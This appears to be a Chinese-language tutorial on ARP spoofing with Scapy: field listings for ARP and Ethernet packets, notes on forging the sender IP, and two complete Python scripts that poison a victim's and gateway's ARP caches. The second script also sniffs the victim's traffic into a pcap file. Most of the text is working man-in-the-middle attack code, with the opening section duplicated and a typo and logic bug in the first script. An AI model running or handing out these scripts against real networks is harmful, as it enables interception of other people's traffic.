python arp欺骗
ls(ARP())
hwtype : XShortField = 1 ('1')
ptype : XShortEnumField = 2048 ('2048')
hwlen : FieldLenField = None ('None')
plen : FieldLenField = None ('None')
op : ShortEnumField = 1 ('1')
hwsrc : MultipleTypeField (SourceMACField, StrFixedLenField) = 'dc:a6:32:bb:49:9d' ('None')
psrc : MultipleTypeField (SourceIPField, SourceIP6Field, StrFixedLenField) = '192.168.1.100' ('None')
hwdst : MultipleTypeField (MACField, StrFixedLenField) = '00:00:00:00:00:00' ('None')
pdst : MultipleTypeField (IPField, IP6Field, StrFixedLenField) = '0.0.0.0' ('None')
>>>
op操作码:默认1,取值1或2,分别代表ARP请求包或响应包(请求操作或响应操作)
hwsrc:发送方MAC地址,用于告诉对方我的MAC地址是什么,默认为本机,所以可以忽略此属性
psrc:发送方IP地址,用于告诉对方我的IP地址是什么 ,可用来伪装
这报文发给谁,由下面的两个属性决定:
hwdst: 对方的MAC地址
pdst:对方的IP地址
ls(Ether())
dst : DestMACField = WARNING: Mac address to reach destination not found. Using broadcast.
'ff:ff:ff:ff:ff:ff' ('None')
src : SourceMACField = 'dc:a6:32:bb:49:9d' ('None')
type : XShortEnumField = 36864 ('36864')
>>>
构造ARP包:
欺骗目标主机,我的是网关:
发送给目标 主机
hwtype : XShortField = 1 ('1')
ptype : XShortEnumField = 2048 ('2048')
hwlen : FieldLenField = None ('None')
plen : FieldLenField = None ('None')
op : ShortEnumField = 1 ('1')
hwsrc : MultipleTypeField (SourceMACField, StrFixedLenField) = 'dc:a6:32:bb:49:9d' ('None')
psrc : MultipleTypeField (SourceIPField, SourceIP6Field, StrFixedLenField) = '192.168.1.100' ('None')
hwdst : MultipleTypeField (MACField, StrFixedLenField) = '00:00:00:00:00:00' ('None')
pdst : MultipleTypeField (IPField, IP6Field, StrFixedLenField) = '0.0.0.0' ('None')
>>>
op操作码:默认1,取值1或2,分别代表ARP请求包或响应包(请求操作或响应操作)
hwsrc:发送方MAC地址,用于告诉对方我的MAC地址是什么,默认为本机,所以可以忽略此属性
psrc:发送方IP地址,用于告诉对方我的IP地址是什么 ,可用来伪装
这报文发给谁,由下面的两个属性决定:
hwdst: 对方的MAC地址
pdst:对方的IP地址
ls(Ether())
dst : DestMACField = WARNING: Mac address to reach destination not found. Using broadcast.
'ff:ff:ff:ff:ff:ff' ('None')
src : SourceMACField = 'dc:a6:32:bb:49:9d' ('None')
type : XShortEnumField = 36864 ('36864')
>>>
构造ARP包:
欺骗目标主机,我的是网关:
发送给目标 主机
import sys,time from scapy.all import * from optparse import OptionParser def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): #ARP缓冲表恢复 print("[*]恢复ARP缓冲。。。") #hwdst="ff:ff:ff:ff:ff:ff"表示以广播的形式发送 send(ARP(op=2,psrc=gateway_ip,pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5) send(ARP(op=2,psrc=target_ip,pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac)) pass def attact_target(gateway_ip,gateway_mac,target_ip,target_mac): poison_target=ARP() poison_target.op=2 poison_target.psrc=gateway_ip poison_target.pdst=target_ip poison_target.hwdst=target_mac #欺骗网关,我是目标主机 发给网关gateway_ip,欺骗它,我的IP是target_ip poison_gateway=ARP() poison_gateway.op=2 poison_gateway.psrc=gateway_ip poison_gateway.pdst=gateway_ip poison_gateway.hwdst=gateway_mac print("[]正在进行投毒[CTRL+C结束「") while 1: try: #循环发送ARP包 send(poison_target) send(poison_gateway) time.sleep(2) except KeyboardInterrupt: restore_target(gateway_ip,gateway_mac,target_ip,target_mac) break print("[*]ARP投毒结束") def main(): usage='sudo python3 arpspoof [-i interface] [-g gateway] host' parser=OptionParser(usage) parser.add_option('-i',dest="interface",type='string',help='网卡') parser.add_option('-g',dest='gateway',type='string',help='网关') (options,args)=parser.parse_args() if len(args)!=1 or options.interface is None or options.gateway is None: parser.print_help() sys.exit(0) interface=options.interface #网卡"wlan0" gateway_ip=options.gateway #网关"192.168.1.1" target_ip="192.168.1.254" conf.iface=interface conf.verb=0 gateway_mac=getmacbyip(gateway_ip) if gateway_mac is None: print("mac获取失败") sys.eixt(0) else: print(gateway_ip,gateway_mac) target_mac=getmacbyip(target_ip) #target_mac=getmacbyip(target_ip) if target_mac is None: print("获取目标MAC失败") else: print("目标主机:%s MAC:%s" % (target_ip,target_mac)) attact_target(gateway_ip,gateway_mac,target_ip,target_mac) main()
from scapy.all import * import os import sys import threading import signal def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): #以下代码中调用send函数的方式稍有不同 print("[*] Restoring target... ") send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5) send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5) #发送退出信号到主线程 os.kill(os.getpid(),signal.SIGINT) def get_mac(ip_address): responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10) #返回从响应数据中获取的Mac地址 for s,r in responses: return r[Ether].src return None def poison_target(gateway_ip,gateway_mac,target_ip,target_mac): poison_target = ARP() poison_target.op = 2 poison_target.psrc = gateway_ip poison_target.pdst = target_ip poison_target.hwdst = target_mac poison_gateway = ARP() poison_gateway.op = 2 poison_gateway.psrc = target_ip poison_gateway.pdst = gateway_ip poison_gateway.hwdst = gateway_mac print("[*] Beginning the ARP poison. [CTRL-C to stop]") while True: try: send(poison_target) send(poison_gateway) time.sleep(2) except KeyboardInterrupt: restore_target(gateway_ip,gateway_mac,target_ip,target_mac) print("[*] ARP poison attack finished. ") return interface = "wlan0" target_ip ="192.168.1.254" #被攻击主机 gateway_ip = "192.168.1.1" #网关 packet_count = 1000 #攻击次数 #设置嗅探的网卡 conf.iface = interface #关闭输出 conf.verb = 0 print("[*] Setting up %s" % (interface)) #print("目标主机:%s MAC:%s" % (target_ip,target_mac)) gateway_mac = get_mac(gateway_ip) if gateway_mac is None: print("[!!!] Failed to get gateway MAC. Exiting. ") sys.exit(0) else: print("[*] Gateway %s is at %s"%(gateway_ip,gateway_mac)) target_mac = get_mac(target_ip) if target_mac is None: print("[!!!] Failed to get target MAC. Exiting. ") sys.exit(0) else: print("[*] Target %s is at %s"%(target_ip,target_mac)) #启动ARP投毒攻击 poison_thread = threading.Thread(target=poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac)) poison_thread.start() try: print("[*] Starting sniffer for %d packets" % (packet_count)) bpf_filter = "ip host %s"%target_ip packets = sniff(count=packet_count,filter=bpf_filter,iface=interface) #将捕获到的数据包输出到文件 wrpcap('arper.pcap',packets) #还原网络配置 restore_target(gateway_ip,gateway_mac,target_ip,target_mac) except KeyboardInterrupt: #还原网络配置 restore_target(gateway_ip,gateway_mac,target_ip,target_mac) sys.exit(0)
